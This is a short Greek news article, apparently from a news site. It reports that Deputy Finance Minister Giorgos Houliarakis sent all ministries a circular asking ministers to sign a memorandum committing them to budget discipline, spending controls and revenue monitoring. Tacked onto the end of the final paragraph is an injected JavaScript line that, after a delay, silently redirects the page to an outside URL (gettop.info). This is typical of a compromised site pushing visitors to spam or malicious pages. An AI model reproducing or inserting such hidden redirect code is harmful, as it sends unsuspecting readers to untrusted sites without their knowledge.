Εγκύκλιος Χουλιαράκη προς υπουργούς να «συμμορφωθούν» στον προϋπολογισμό

0
11

 

  Eγκύκλιο απέστειλε σε όλα τα υπουργεία ο αναπληρωτής υπουργός Οικονομικών, Γιώργος Χουλιαράκης για την ομαλή εκτέλεση του προϋπολογισμού και σύμφωνα με πληροφορίες μέσα στο κείμενο της εγκυκλίου υπάρχουν τέσσερις σελίδες το «Μνημόνιο Συνεργασίας», το οποίο και ζητεί να υπογράψουν όλα τα μέλη της κυβέρνησης.

Σύμφωνα με την εγκύκλιο, οι υπουργοί δεσμεύονται ότι δεν θα αναλαμβάνουν την παραμικρή υποχρέωση, εάν προηγουμένως δεν έχουν διασφαλιστεί τα κονδύλια για τη χρηματοδότηση και την κάλυψη της οποιασδήποτε ανάγκης.

Ο αναπληρωτής υπουργός ζητεί επίσης από κάθε υπουργό, να δεσμευθεί ότι θα λάβει άμεσα μέτρα για την αποτροπή παρεκκλίσεων στην εκτέλεση του προϋπολογισμού.

Σύμφωνα με το κείμενο της εγκυκλίου οι υπουργοί καλούνται να υπογράψουν ότι:

Θα εφαρμόζουν «διορθωτικές παρεμβάσεις σε περίπτωση εμφανούς απόκλισης από τους στόχους».

Θα λειτουργούν εσωτερικά συστήματα και μηχανισμούς παρακολούθησης της εκτέλεσης του προϋπολογισμού, ώστε να διασφαλίσουν τη χρηστή δημοσιονομική διαχείριση.

Δεν θα αναλάβουν κάποια υποχρέωση εάν δεν εξασφαλίζεται ότι υπάρχουν τα χρήματα για την κάλυψη της.

Θα υπογράψουν μνημόνια με τους εποπτευόμενους φορείς για την λήψη κάθε πρόσφορου και αναγκαίου μέτρου, όπως η μείωση των εξόδων του φορέα, σε συνάρτηση με την πορεία υλοποίησης των εσόδων.

Θα λάβουν τα απαραίτητα μέτρα για την ρεαλιστικότερη εκτίμηση, πρόβλεψη και παρακολούθηση των εσόδων και εξόδων των εποπτευόμενων φορέων της γενικής κυβέρνησης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here